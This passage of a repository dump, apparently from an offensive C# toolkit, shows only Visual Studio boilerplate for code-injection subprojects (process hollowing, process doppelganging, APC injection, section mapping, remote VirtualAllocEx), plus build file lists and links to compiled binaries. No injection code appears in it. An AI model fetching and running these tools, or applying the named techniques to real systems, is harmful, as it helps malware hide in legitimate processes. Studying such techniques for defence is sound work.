[assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("24f8470a-7f69-4516-b1be-8235dcaee1ae")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/bin/Debug/process_hollowing.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/process_hollowing/bin/Debug/process_hollowing.exe -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/bin/Debug/process_hollowing.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/bin/Debug/process_hollowing.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/process_hollowing/bin/Debug/process_hollowing.pdb -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/process_hollowing/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/obj/Debug/process_hollowing.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\process_hollowing\process_hollowing\bin\Debug\process_hollowing.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\process_hollowing\process_hollowing\bin\Debug\process_hollowing.exe 3 | C:\Users\stargirl\source\repos\WinAPI\process_hollowing\process_hollowing\bin\Debug\process_hollowing.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\process_hollowing\process_hollowing\obj\Debug\process_hollowing.exe 5 | C:\Users\stargirl\source\repos\WinAPI\process_hollowing\process_hollowing\obj\Debug\process_hollowing.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\process_hollowing\process_hollowing\obj\Debug\process_hollowing.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/obj/Debug/process_hollowing.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/process_hollowing/obj/Debug/process_hollowing.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/obj/Debug/process_hollowing.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/process_hollowing/obj/Debug/process_hollowing.exe -------------------------------------------------------------------------------- /Code Injections/ProcessHollow64/process_hollowing/obj/Debug/process_hollowing.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/ProcessHollow64/process_hollowing/obj/Debug/process_hollowing.pdb -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/.suo -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/.vs/ProcessDoppleganging/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessDoppleganging", "ProcessDoppleganging\ProcessDoppleganging.csproj", "{E4F12493-F65B-4762-98B8-48C7323EC215}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {E4F12493-F65B-4762-98B8-48C7323EC215}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {E4F12493-F65B-4762-98B8-48C7323EC215}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {E4F12493-F65B-4762-98B8-48C7323EC215}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {E4F12493-F65B-4762-98B8-48C7323EC215}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {0CF056B0-EE06-4B4C-954B-D11CBC1AFFC6} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ProcessDoppleganging")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ProcessDoppleganging")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("e4f12493-f65b-4762-98b8-48c7323ec215")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/bin/Debug/ProcessDoppleganging.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/ProcessDoppleganging/bin/Debug/ProcessDoppleganging.exe -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/bin/Debug/ProcessDoppleganging.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/bin/Debug/ProcessDoppleganging.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/ProcessDoppleganging/bin/Debug/ProcessDoppleganging.pdb -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/bin/Debug/calc2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/ProcessDoppleganging/bin/Debug/calc2.exe -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/ProcessDoppleganging.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\ProcessDoppleganging\ProcessDoppleganging\bin\Debug\ProcessDoppleganging.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\ProcessDoppleganging\ProcessDoppleganging\bin\Debug\ProcessDoppleganging.exe 3 | C:\Users\stargirl\source\repos\WinAPI\ProcessDoppleganging\ProcessDoppleganging\bin\Debug\ProcessDoppleganging.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\ProcessDoppleganging\ProcessDoppleganging\obj\Debug\ProcessDoppleganging.exe 5 | C:\Users\stargirl\source\repos\WinAPI\ProcessDoppleganging\ProcessDoppleganging\obj\Debug\ProcessDoppleganging.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\ProcessDoppleganging\ProcessDoppleganging\obj\Debug\ProcessDoppleganging.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/ProcessDoppleganging.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/ProcessDoppleganging.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/ProcessDoppleganging.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/ProcessDoppleganging.exe -------------------------------------------------------------------------------- /Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/ProcessDoppleganging.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Processdoppelgang64/ProcessDoppleganging/obj/Debug/ProcessDoppleganging.pdb -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/.vs/apcinjection/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/.vs/apcinjection/v16/.suo -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/.vs/apcinjection/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "apcinjection", "apcinjection\apcinjection.csproj", "{A6CC3E2D-78A8-4028-ABB7-A15E3BF0798F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {A6CC3E2D-78A8-4028-ABB7-A15E3BF0798F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {A6CC3E2D-78A8-4028-ABB7-A15E3BF0798F}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {A6CC3E2D-78A8-4028-ABB7-A15E3BF0798F}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {A6CC3E2D-78A8-4028-ABB7-A15E3BF0798F}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {190B94AA-0BF0-4523-BE9D-33C6285353EF} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("apcinjection")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("apcinjection")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("a6cc3e2d-78a8-4028-abb7-a15e3bf0798f")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/bin/Debug/apcinjection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/apcinjection/bin/Debug/apcinjection.exe -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/bin/Debug/apcinjection.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/bin/Debug/apcinjection.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/apcinjection/bin/Debug/apcinjection.pdb -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/apcinjection/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/obj/Debug/apcinjection.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\apcinjection\apcinjection\bin\Debug\apcinjection.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\apcinjection\apcinjection\bin\Debug\apcinjection.exe 3 | C:\Users\stargirl\source\repos\WinAPI\apcinjection\apcinjection\bin\Debug\apcinjection.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\apcinjection\apcinjection\obj\Debug\apcinjection.exe 5 | C:\Users\stargirl\source\repos\WinAPI\apcinjection\apcinjection\obj\Debug\apcinjection.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\apcinjection\apcinjection\obj\Debug\apcinjection.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/obj/Debug/apcinjection.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/apcinjection/obj/Debug/apcinjection.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/obj/Debug/apcinjection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/apcinjection/obj/Debug/apcinjection.exe -------------------------------------------------------------------------------- /Code Injections/Queue APC Injections/apcinjection/obj/Debug/apcinjection.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/Queue APC Injections/apcinjection/obj/Debug/apcinjection.pdb -------------------------------------------------------------------------------- /Code Injections/SectionMap/.vs/sectionmap/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/.vs/sectionmap/v16/.suo -------------------------------------------------------------------------------- /Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/.vs/sectionmap/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sectionmap", "sectionmap\sectionmap.csproj", "{A5B23AEA-B6BA-47FE-A936-5B53FC26C39D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {A5B23AEA-B6BA-47FE-A936-5B53FC26C39D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {A5B23AEA-B6BA-47FE-A936-5B53FC26C39D}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {A5B23AEA-B6BA-47FE-A936-5B53FC26C39D}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {A5B23AEA-B6BA-47FE-A936-5B53FC26C39D}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {AEA68AA5-DD1D-45C0-BA19-928A2F10EE77} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("sectionmap")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("sectionmap")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("a5b23aea-b6ba-47fe-a936-5b53fc26c39d")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/bin/Debug/sectionmap.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/sectionmap/bin/Debug/sectionmap.exe -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/bin/Debug/sectionmap.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/bin/Debug/sectionmap.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/sectionmap/bin/Debug/sectionmap.pdb -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/sectionmap/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/obj/Debug/sectionmap.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\sectionmap\sectionmap\bin\Debug\sectionmap.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\sectionmap\sectionmap\bin\Debug\sectionmap.exe 3 | C:\Users\stargirl\source\repos\WinAPI\sectionmap\sectionmap\bin\Debug\sectionmap.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\sectionmap\sectionmap\obj\Debug\sectionmap.exe 5 | C:\Users\stargirl\source\repos\WinAPI\sectionmap\sectionmap\obj\Debug\sectionmap.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\sectionmap\sectionmap\obj\Debug\sectionmap.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/obj/Debug/sectionmap.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/sectionmap/obj/Debug/sectionmap.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/obj/Debug/sectionmap.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/sectionmap/obj/Debug/sectionmap.exe -------------------------------------------------------------------------------- /Code Injections/SectionMap/sectionmap/obj/Debug/sectionmap.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/SectionMap/sectionmap/obj/Debug/sectionmap.pdb -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/.suo -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Code Injections/virtualallocex_remoteprocess/.vs/virtualallocex_remoteprocess/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Code 